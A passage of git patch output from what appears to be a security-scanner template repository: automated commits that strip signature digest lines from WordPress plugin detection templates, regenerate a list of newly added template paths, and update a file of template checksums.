490a0046304402202bbb310f689618e7c793cb00d8071bdcff1577e0ac9c700b254c0da69e5873fc022058bf9b507454769707b8c6f0a17fe920142d2e66bf73bfe5c1bfc24ff39a6244:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 44755aa069..aaaf0f9a17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100c1554a551d5616c12f6afcf2034482ed74abe212be31908a4e2d3e0422402fab02206456c205e101a00c688d5a8adf986779b00c81438008b1ae7cdf1615e02c9ad2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 3faa68bd33..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502207187493543aa5bf67960bd1c0053cd2212ea93dfc5b36f1bd36e6c7fe2e147c4022100909fcc8e6ccd59b2a046a242967b99d5823b71d445e55a5e070a737c4cbeb22b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index a2e3bb89de..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402202c5bd832930f2b6a99a1ed40dfc04e1db9f29ba191b8dc94a766def2e0b96c1602206eeac465892fdf3e89c287c2331b7718db6eb2c5657a03c294f1dc5da8610ef7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 8c658b18b4..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,5 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a0048304602210092ebd3518cebbffc7a57b56955e243a51781f6cd6c2915ad1236fe47a2fab391022100f98f86e77ae17053a1a16e17aae06eea1d5c5ac5b246dfd850b00379d072da48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b9b2cfca7a7b0779797c4d2a83c57a2a6e33bfb8 Mon Sep 17 00:00:00 2001 From: ghost Date: Tue, 15 Oct 2024 07:16:20 +0000 Subject: [PATCH 073/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 70 ++------------------------------------------------ 1 file changed, 2 insertions(+), 68 deletions(-) diff --git a/.new-additions b/.new-additions index 5b06a87c90..6f7db3503c 100644 --- a/.new-additions +++ b/.new-additions @@ -1,68 +1,2 @@ -code/cves/2024/CVE-2024-4340.yaml -code/cves/2024/CVE-2024-45409.yaml -http/cves/2017/CVE-2017-5871.yaml -http/cves/2019/CVE-2019-19411.yaml -http/cves/2021/CVE-2021-25094.yaml -http/cves/2021/CVE-2021-40272.yaml -http/cves/2023/CVE-2023-0676.yaml -http/cves/2023/CVE-2023-27641.yaml -http/cves/2023/CVE-2023-39007.yaml -http/cves/2023/CVE-2023-4151.yaml -http/cves/2023/CVE-2023-47105.yaml -http/cves/2024/CVE-2024-3234.yaml -http/cves/2024/CVE-2024-32964.yaml -http/cves/2024/CVE-2024-35627.yaml -http/cves/2024/CVE-2024-3753.yaml -http/cves/2024/CVE-2024-38816.yaml -http/cves/2024/CVE-2024-43160.yaml -http/cves/2024/CVE-2024-43917.yaml -http/cves/2024/CVE-2024-45440.yaml -http/cves/2024/CVE-2024-46627.yaml -http/cves/2024/CVE-2024-4940.yaml -http/cves/2024/CVE-2024-5488.yaml -http/cves/2024/CVE-2024-6517.yaml -http/cves/2024/CVE-2024-7354.yaml -http/cves/2024/CVE-2024-7714.yaml -http/cves/2024/CVE-2024-7854.yaml -http/cves/2024/CVE-2024-8021.yaml -http/cves/2024/CVE-2024-8877.yaml -http/cves/2024/CVE-2024-9463.yaml -http/cves/2024/CVE-2024-9465.yaml -http/default-logins/datagerry/datagerry-default-login.yaml -http/default-logins/netdisco/netdisco-default-login.yaml -http/exposed-panels/dockwatch-panel.yaml -http/exposed-panels/enablix-panel.yaml -http/exposed-panels/gitlab-explore.yaml -http/exposed-panels/gitlab-saml.yaml -http/exposed-panels/loxone-web-panel.yaml -http/exposed-panels/m-bus-panel.yaml -http/exposed-panels/macos-server-panel.yaml -http/exposed-panels/riello-netman204-panel.yaml -http/exposed-panels/rstudio-panel.yaml -http/exposed-panels/saia-pcd-panel.yaml -http/exposed-panels/workspace-one-uem-ssp.yaml -http/exposures/logs/action-controller-exception.yaml -http/exposures/logs/delphi-mvc-exception.yaml -http/exposures/logs/expression-engine-exception.yaml -http/exposures/logs/lua-runtime-error.yaml -http/exposures/logs/mako-runtime-error.yaml -http/exposures/logs/microsoft-runtime-error.yaml -http/exposures/logs/mongodb-exception-page.yaml -http/exposures/logs/sap-logon-error-message.yaml -http/exposures/logs/twig-runtime-error.yaml -http/miscellaneous/seized-site.yaml -http/misconfiguration/ariang-debug-console.yaml -http/misconfiguration/microsoft/aspnetcore-dev-env.yaml -http/misconfiguration/netdisco/netdisco-unauth.yaml -http/technologies/arcgis-detect.yaml -http/technologies/dizquetv-detect.yaml -http/technologies/ivanti-epm-detect.yaml -http/technologies/microsoft/default-azure-function-app.yaml -http/technologies/vertigis-detect.yaml -http/technologies/wiki-js-detect.yaml -http/technologies/windows-communication-foundation-detect.yaml -http/token-spray/api-delighted.yaml -http/token-spray/api-intigriti.yaml -http/token-spray/api-telegram.yaml -http/vulnerabilities/retool/retool-svg-xss.yaml -http/vulnerabilities/wordpress/ninja-forms-xss.yaml +http/exposed-panels/traccar-panel.yaml +http/technologies/wordpress/plugins/burst-statistics.yaml From b659588ea03e303e64ba211f7466bfa6505ed031 Mon Sep 17 00:00:00 2001 From: ghost Date: Tue, 15 Oct 2024 07:17:07 +0000 Subject: [PATCH 074/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 31 +++++++++++++++++-------------- 1 file changed, 17 insertions(+), 14 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0a7c37248c..c6ad242497 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2,12 +2,12 @@ CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593 CONTRIBUTING.md:2a3eb51d00e6dc20f0d98db5996f905ca347d1ac LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7 -README.md:5ccedf3ac25ae1bbe61c8bd72d00735183ab7ca4 +README.md:9fd622dcec4899ea5baa796f397b91f057e5ffa9 README_JA.md:1d51d07fc938a8a01ea25cf9226137e539308274 README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26 -TEMPLATES-STATS.json:e0b4770701eac156455dc0bfb955988228fd540c -TEMPLATES-STATS.md:4d342a2f28a6e0a995a82ac74bf0f2864e5b8056 -TOP-10.md:34d9db9b4682554154a2d5853d97024691d9a30c +TEMPLATES-STATS.json:85a09a91777282456739fafa58cc5ab4e2804c67 +TEMPLATES-STATS.md:5cf01003d23552906c67c922333c8a30c8ec7aab +TOP-10.md:4a9f2f32f992a09fcdfb0f86afd3eccdc24e4f6e cloud/aws/acm/acm-cert-expired.yaml:5c2330bf9034cad5cde868b85128ba737f45c37f cloud/aws/acm/acm-cert-renewal-30days.yaml:ad88137bc1382a729e7b3f3a0172aab684af2743 cloud/aws/acm/acm-cert-renewal-45days.yaml:0cb9388dd736046c47748a973e9092c12ada2f79 @@ -437,7 +437,7 @@ dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml:dd74fab89b79b6fb65fc5743f15aaf20ec2 dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml:322e63c2fde38a3f84d349820850fc73bac1c936 dast/vulnerabilities/redirect/open-redirect.yaml:2f05e6169e385b0142d95ee6918e5c0e36bc4224 dast/vulnerabilities/rfi/generic-rfi.yaml:de3d066b0dc329ffbb333def6e7f1a5a4c1d5836 -dast/vulnerabilities/sqli/sqli-error-based.yaml:9ada55338dfa2695da8ffda107f47954a6f843c7 +dast/vulnerabilities/sqli/sqli-error-based.yaml:e4be137096c5190171b6ce4531571a828f2568ee dast/vulnerabilities/sqli/time-based-sqli.yaml:c0bf67162953a70d11c3915a49e2a19a459b5f74 dast/vulnerabilities/ssrf/blind-ssrf.yaml:27e68a58e240f97f21f3e0be91a88253d459a830 dast/vulnerabilities/ssrf/response-ssrf.yaml:104def6ff82e4dcfc88917f98403bea903e39d79 @@ -940,7 +940,7 @@ helpers/wordpress/plugins/advanced-custom-fields.txt:e7da2a0745fb6eea51b8db7996a helpers/wordpress/plugins/akismet.txt:dc89f60f46ccf047183c71c1efe28ba794cbc8f8 helpers/wordpress/plugins/all-404-redirect-to-homepage.txt:e5d05199b7d43b0bd203a9cf2e8e874dad4ff45f helpers/wordpress/plugins/all-in-one-seo-pack.txt:11c21d25c5f721b65beda2f8949654938e0983ab -helpers/wordpress/plugins/all-in-one-wp-migration.txt:2664d4d92d63cd64b798e0938ea472bb83b79e50 +helpers/wordpress/plugins/all-in-one-wp-migration.txt:9aff3c20ba6442ceb46269fcee1508f5f589d935 helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:dc89f60f46ccf047183c71c1efe28ba794cbc8f8 helpers/wordpress/plugins/amp.txt:c78453b22ddacc88b67ece8b294a6b5930f15836 helpers/wordpress/plugins/antispam-bee.txt:ce256ecfbb665c5366c1669a3e7c3a24c65a6fa2 @@ -1016,7 +1016,7 @@ helpers/wordpress/plugins/gutenberg.txt:c2c8b6556ffcc478de8bab6d3bf25a03ec9b0175 helpers/wordpress/plugins/happy-elementor-addons.txt:b3fc492a7d2d9797e8ced6c52045e74bafbc5ad7 helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b0c92eee4be757761 helpers/wordpress/plugins/header-footer-code-manager.txt:596a66f2da4ffe94196f103a2955c002b20746ee -helpers/wordpress/plugins/header-footer-elementor.txt:a1db23887f98254a1462c9c8ff5e7598a67ff4c3 +helpers/wordpress/plugins/header-footer-elementor.txt:36b110cd09b4b8462e6d08114636299b7651ab77 helpers/wordpress/plugins/header-footer.txt:e533118608a55d6ab1d3699c600fc5c59213df36 helpers/wordpress/plugins/health-check.txt:348b6913760dfd78a9394bc38c5a8fa7528208e2 helpers/wordpress/plugins/hello-dolly.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad @@ -1031,7 +1031,7 @@ helpers/wordpress/plugins/instagram-feed.txt:08d2e98e6754af941484848930ccbaddfef helpers/wordpress/plugins/intuitive-custom-post-order.txt:b0dcf3b058d1447f7795e1c1a95d9af3377f899d helpers/wordpress/plugins/iwp-client.txt:6c3371737e84ab4219f83867466569f042741c0c helpers/wordpress/plugins/jetpack-boost.txt:2760f23f36812b1f488df2ca1b312429d68b0f8e -helpers/wordpress/plugins/jetpack.txt:79d2c40ed03fcf84910a5a9d26bf752a8684f7be +helpers/wordpress/plugins/jetpack.txt:686e3528babff806de1f1634899ad0543e550328 helpers/wordpress/plugins/kadence-blocks.txt:054dae9d64c38d76a066c981fbdab975b1abbf53 helpers/wordpress/plugins/kirki.txt:9640fdbbae3c8e8f74e96e656f485284e8f8ed9d helpers/wordpress/plugins/leadin.txt:4b56d2dcd702b10856068019f6df67c19347a2b5 @@ -1137,10 +1137,10 @@ helpers/wordpress/plugins/worker.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/wp-crontrol.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/wp-fastest-cache.txt:ccefc2f8651dab1dca3f5569d5c8495d75f8956a helpers/wordpress/plugins/wp-file-manager.txt:db63fca627057d07dbd8d5064a623a9cd31006f9 -helpers/wordpress/plugins/wp-google-maps.txt:a7271cc82e11f6991ba3e441b86276cbfd98f338 +helpers/wordpress/plugins/wp-google-maps.txt:cfea9428a1a199afcd685b96a20598b45fd3507c helpers/wordpress/plugins/wp-mail-logging.txt:8fd8331f772b1227e5913d3649cdb93d928aaebf helpers/wordpress/plugins/wp-mail-smtp.txt:3ba1cdcd02c8fe15ffff21ff0cb646a3324830ca -helpers/wordpress/plugins/wp-maintenance-mode.txt:8af94a036b8c024b44d739c2f528681bc08da516 +helpers/wordpress/plugins/wp-maintenance-mode.txt:b0f827f6588ea6305e79126fa44e3fda7f178356 helpers/wordpress/plugins/wp-migrate-db.txt:b8693a006e8d4b4817ba2402c67eff9e73383a45 helpers/wordpress/plugins/wp-multibyte-patch.txt:01fa77eedfbdd7455e8cf0cf239a4deb3041acfd helpers/wordpress/plugins/wp-optimize.txt:ed29a20d4d5440e7bc8a8339197df0ad37810755 @@ -1433,7 +1433,7 @@ http/cves/2013/CVE-2013-4625.yaml:889425384d1791c8d64f2a01c5073faa8e752636 http/cves/2013/CVE-2013-5528.yaml:b9dd20d30e2aec7bf16c605678c6489ee1d01cea http/cves/2013/CVE-2013-5979.yaml:c1439b35c3ea1ab4d7f5ed19ccc670b75094c431 http/cves/2013/CVE-2013-6281.yaml:a8aca0c3a8f4ca7f993970d911143adde9144d8e -http/cves/2013/CVE-2013-7091.yaml:99b3da888711a7d3490403fdf846d9df77ffc487 +http/cves/2013/CVE-2013-7091.yaml:231410488a8e5715b96abd8723a8b1445d3a895e http/cves/2013/CVE-2013-7240.yaml:4ff6b9c5fc7d8c94d20690a220d7618948a20b86 http/cves/2013/CVE-2013-7285.yaml:b736c63de6a3a9021e2959f2758b08d4361d2dcd http/cves/2014/CVE-2014-10037.yaml:0ef395d3b049fc99af52a0d7ca44ee7d029b1048 @@ -5137,6 +5137,7 @@ http/exposed-panels/toshiba/topaccess-panel.yaml:f18dd04653999ce3f0744d4e9540a8e http/exposed-panels/total-web-solutions-panel.yaml:c792bfbfed0cfe6971fecf0aa42d4fb417b3d49a http/exposed-panels/totemomail-panel.yaml:a1f46a2540203c5c3093a82282bb98164bb1bf8b http/exposed-panels/tplink/tplink-r470t-panel.yaml:80f1bd596c3ae984132e2848c486a0ba4050dc4e +http/exposed-panels/traccar-panel.yaml:486434503967d7cf27366a20873eb20385a8c600 http/exposed-panels/tracer-sc-login.yaml:57902ac871a95304f034d0aa4a2cb96f04cad2a6 http/exposed-panels/traefik-dashboard.yaml:19db275a7effc62cc9fee16ae6e6b4ac81b98635 http/exposed-panels/trellix-panel.yaml:11b8a41da81bf4dc46c5a373e8c909b36130c29c @@ -5147,6 +5148,7 @@ http/exposed-panels/tup-openframe.yaml:8e6f0bcd762cdf9098621e8323e811b702424060 http/exposed-panels/turnkey-lamp-panel.yaml:8ec785a66d2050a19b465630ee89555e0d90798a http/exposed-panels/turnkey-openvpn.yaml:499a14d9a3eb9ca68ffcf856cd357b8a552bf30b http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b62882f835d9f0767 +http/exposed-panels/txadmin-panel.yaml:3665875f4ca027e66c8cbf19f318d4a31b794581 http/exposed-panels/typo3-login.yaml:4e116dbb08d4fa3bc3aed57ad47e38728f911996 http/exposed-panels/uipath-orchestrator-panel.yaml:1e4773c92945e1f16a1f0d3fc7adb63f2eaa227b http/exposed-panels/umami-panel.yaml:f6551441a99dfa7eae097d14e7adc8122ce8cb8d @@ -7835,6 +7837,7 @@ http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae787 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 http/technologies/wordpress/plugins/broken-link-checker.yaml:4a4148493de40c756d2829cbfbd4bed442a270bf +http/technologies/wordpress/plugins/burst-statistics.yaml:8ae381b1138e0ed2a3121f84c7e14d33a6d6ed8a http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 @@ -7932,7 +7935,7 @@ http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f776 http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 http/technologies/wordpress/plugins/meta-box.yaml:285b1f97492cb199c5f4b4bcc5a6dd7ec2c24211 http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e -http/technologies/wordpress/plugins/ml-slider.yaml:3ab36b0c56e6ee82f2ff225ddfd98692c3e551ac +http/technologies/wordpress/plugins/ml-slider.yaml:2fb6e282504f3ab516bf8dda5fa84624bec49aea http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 @@ -9223,7 +9226,7 @@ javascript/cves/2024/CVE-2024-47176.yaml:e42105b056536c9f39f5896585164b97d79413f javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad javascript/default-logins/redis-default-logins.yaml:94bc6aea27f0f07f41834001f2efd51758a8ac2b -javascript/default-logins/ssh-default-logins.yaml:7e0cd6f7e1cd9ff4473f9c0d9061f056234cbb62 +javascript/default-logins/ssh-default-logins.yaml:2b9aeadfb99b58a2935dfd62ef7c113d5e6322cc javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94 javascript/detection/oracle-tns-listener.yaml:22422a4d4104d0af98420fb8b2207b8eab8a8ab9 javascript/detection/samba-detect.yaml:58ae5e9f3fa51624995c4060fccc13dfde9cbe59 @@ -9458,7 +9461,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:277515c4987f854080b8ef6c40eec7f78999e499 +templates-checksum.txt:96fce1a5bbece94aa04d9788ee9e1e784488ccfb wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 02e80b673451380bb5b4517256fbcb95fa674d9e Mon Sep 17 00:00:00 2001 From: ghost Date: Tue, 15 Oct 2024 07:17:56 +0000 Subject: [PATCH 075/218] =?UTF-8?q?chore:=20sign=20templates=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- http/exposed-panels/traccar-panel.yaml | 2 ++ http/technologies/wordpress/plugins/ad-inserter.yaml | 2 ++ http/technologies/wordpress/plugins/add-to-any.yaml | 2 ++ http/technologies/wordpress/plugins/admin-menu-editor.yaml | 2 ++ http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 2 ++ http/technologies/wordpress/plugins/akismet.yaml | 2 ++ http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 2 ++ .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 2 ++ .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 2 ++ http/technologies/wordpress/plugins/amp.yaml | 2 ++ http/technologies/wordpress/plugins/antispam-bee.yaml | 2 ++ http/technologies/wordpress/plugins/astra-sites.yaml | 2 ++ http/technologies/wordpress/plugins/autoptimize.yaml | 2 ++ http/technologies/wordpress/plugins/backwpup.yaml | 2 ++ http/technologies/wordpress/plugins/better-search-replace.yaml | 2 ++ http/technologies/wordpress/plugins/better-wp-security.yaml | 2 ++ .../wordpress/plugins/black-studio-tinymce-widget.yaml | 2 ++ http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 2 ++ http/technologies/wordpress/plugins/breeze.yaml | 2 ++ http/technologies/wordpress/plugins/broken-link-checker.yaml | 2 ++ http/technologies/wordpress/plugins/chaty.yaml | 2 ++ .../wordpress/plugins/child-theme-configurator.yaml | 2 ++ http/technologies/wordpress/plugins/classic-editor.yaml | 2 ++ http/technologies/wordpress/plugins/classic-widgets.yaml | 2 ++ .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 2 ++ http/technologies/wordpress/plugins/cmb2.yaml | 2 ++ http/technologies/wordpress/plugins/coblocks.yaml | 2 ++ http/technologies/wordpress/plugins/code-snippets.yaml | 2 ++ http/technologies/wordpress/plugins/coming-soon.yaml | 2 ++ http/technologies/wordpress/plugins/complianz-gdpr.yaml | 2 ++ .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 2 ++ http/technologies/wordpress/plugins/contact-form-7.yaml | 2 ++ http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 2 ++ http/technologies/wordpress/plugins/cookie-law-info.yaml | 2 ++ http/technologies/wordpress/plugins/cookie-notice.yaml | 2 ++ http/technologies/wordpress/plugins/copy-delete-posts.yaml | 2 ++ http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 2 ++ .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 2 ++ http/technologies/wordpress/plugins/custom-css-js.yaml | 2 ++ http/technologies/wordpress/plugins/custom-fonts.yaml | 2 ++ http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 2 ++ http/technologies/wordpress/plugins/disable-comments.yaml | 2 ++ http/technologies/wordpress/plugins/disable-gutenberg.yaml | 2 ++ http/technologies/wordpress/plugins/duplicate-page.yaml | 2 ++ http/technologies/wordpress/plugins/duplicate-post.yaml | 2 ++ http/technologies/wordpress/plugins/duplicator.yaml | 2 ++ .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 2 ++ http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 2 ++ http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 2 ++ http/technologies/wordpress/plugins/elementor.yaml | 2 ++ http/technologies/wordpress/plugins/elementskit-lite.yaml | 2 ++ http/technologies/wordpress/plugins/enable-media-replace.yaml | 2 ++ http/technologies/wordpress/plugins/envato-elements.yaml | 2 ++ .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 2 ++ http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 2 ++ http/technologies/wordpress/plugins/extendify.yaml | 2 ++ .../wordpress/plugins/facebook-for-woocommerce.yaml | 2 ++ http/technologies/wordpress/plugins/fast-indexing-api.yaml | 2 ++ http/technologies/wordpress/plugins/flamingo.yaml | 2 ++ http/technologies/wordpress/plugins/fluent-smtp.yaml | 2 ++ http/technologies/wordpress/plugins/fluentform.yaml | 2 ++ http/technologies/wordpress/plugins/font-awesome.yaml | 2 ++ .../wordpress/plugins/force-regenerate-thumbnails.yaml | 2 ++ http/technologies/wordpress/plugins/formidable.yaml | 2 ++ http/technologies/wordpress/plugins/forminator.yaml | 2 ++ http/technologies/wordpress/plugins/ga-google-analytics.yaml | 2 ++ http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 2 ++ .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 2 ++ .../wordpress/plugins/google-analytics-for-wordpress.yaml | 2 ++ .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 2 ++ http/technologies/wordpress/plugins/google-site-kit.yaml | 2 ++ .../wordpress/plugins/google-sitemap-generator.yaml | 2 ++ http/technologies/wordpress/plugins/gtranslate.yaml | 2 ++ http/technologies/wordpress/plugins/gutenberg.yaml | 2 ++ http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 2 ++ .../wordpress/plugins/header-footer-code-manager.yaml | 2 ++ .../technologies/wordpress/plugins/header-footer-elementor.yaml | 2 ++ http/technologies/wordpress/plugins/header-footer.yaml | 2 ++ http/technologies/wordpress/plugins/health-check.yaml | 2 ++ http/technologies/wordpress/plugins/hello-dolly.yaml | 2 ++ http/technologies/wordpress/plugins/host-webfonts-local.yaml | 2 ++ http/technologies/wordpress/plugins/hostinger.yaml | 2 ++ http/technologies/wordpress/plugins/image-optimization.yaml | 2 ++ http/technologies/wordpress/plugins/imagify.yaml | 2 ++ .../wordpress/plugins/insert-headers-and-footers.yaml | 2 ++ http/technologies/wordpress/plugins/instagram-feed.yaml | 2 ++ .../wordpress/plugins/intuitive-custom-post-order.yaml | 2 ++ http/technologies/wordpress/plugins/jetpack-boost.yaml | 2 ++ http/technologies/wordpress/plugins/jetpack.yaml | 2 ++ http/technologies/wordpress/plugins/kadence-blocks.yaml | 2 ++ http/technologies/wordpress/plugins/kirki.yaml | 2 ++ http/technologies/wordpress/plugins/leadin.yaml | 2 ++ .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 2 ++ http/technologies/wordpress/plugins/limit-login-attempts.yaml | 2 ++ http/technologies/wordpress/plugins/litespeed-cache.yaml | 2 ++ http/technologies/wordpress/plugins/loco-translate.yaml | 2 ++ http/technologies/wordpress/plugins/loginizer.yaml | 2 ++ .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 2 ++ http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 2 ++ http/technologies/wordpress/plugins/mailpoet.yaml | 2 ++ http/technologies/wordpress/plugins/maintenance.yaml | 2 ++ http/technologies/wordpress/plugins/mainwp-child.yaml | 2 ++ http/technologies/wordpress/plugins/malcare-security.yaml | 2 ++ http/technologies/wordpress/plugins/megamenu.yaml | 2 ++ http/technologies/wordpress/plugins/members.yaml | 2 ++ http/technologies/wordpress/plugins/meta-box.yaml | 2 ++ http/technologies/wordpress/plugins/metform.yaml | 2 ++ http/technologies/wordpress/plugins/ml-slider.yaml | 2 ++ http/technologies/wordpress/plugins/newsletter.yaml | 2 ++ .../wordpress/plugins/nextend-facebook-connect.yaml | 2 ++ http/technologies/wordpress/plugins/nextgen-gallery.yaml | 2 ++ http/technologies/wordpress/plugins/ninja-forms.yaml | 2 ++ http/technologies/wordpress/plugins/ocean-extra.yaml | 2 ++ .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 2 ++ http/technologies/wordpress/plugins/one-click-demo-import.yaml | 2 ++ http/technologies/wordpress/plugins/optinmonster.yaml | 2 ++ http/technologies/wordpress/plugins/otter-blocks.yaml | 2 ++ http/technologies/wordpress/plugins/password-protected.yaml | 2 ++ http/technologies/wordpress/plugins/pdf-embedder.yaml | 2 ++ .../wordpress/plugins/pinterest-for-woocommerce.yaml | 2 ++ http/technologies/wordpress/plugins/pixelyoursite.yaml | 2 ++ http/technologies/wordpress/plugins/polylang.yaml | 2 ++ http/technologies/wordpress/plugins/popup-maker.yaml | 2 ++ http/technologies/wordpress/plugins/post-smtp.yaml | 2 ++ http/technologies/wordpress/plugins/post-types-order.yaml | 2 ++ .../wordpress/plugins/premium-addons-for-elementor.yaml | 2 ++ http/technologies/wordpress/plugins/pretty-link.yaml | 2 ++ http/technologies/wordpress/plugins/really-simple-captcha.yaml | 2 ++ http/technologies/wordpress/plugins/really-simple-ssl.yaml | 2 ++ http/technologies/wordpress/plugins/redirection.yaml | 2 ++ http/technologies/wordpress/plugins/redux-framework.yaml | 2 ++ http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 2 ++ http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 2 ++ http/technologies/wordpress/plugins/safe-svg.yaml | 2 ++ http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 2 ++ http/technologies/wordpress/plugins/sg-cachepress.yaml | 2 ++ http/technologies/wordpress/plugins/sg-security.yaml | 2 ++ http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 2 ++ .../wordpress/plugins/shortpixel-image-optimiser.yaml | 2 ++ .../wordpress/plugins/simple-custom-post-order.yaml | 2 ++ http/technologies/wordpress/plugins/simple-history.yaml | 2 ++ http/technologies/wordpress/plugins/siteguard.yaml | 2 ++ http/technologies/wordpress/plugins/siteorigin-panels.yaml | 2 ++ http/technologies/wordpress/plugins/smart-slider-3.yaml | 2 ++ http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 2 ++ .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 2 ++ .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 2 ++ http/technologies/wordpress/plugins/sucuri-scanner.yaml | 2 ++ 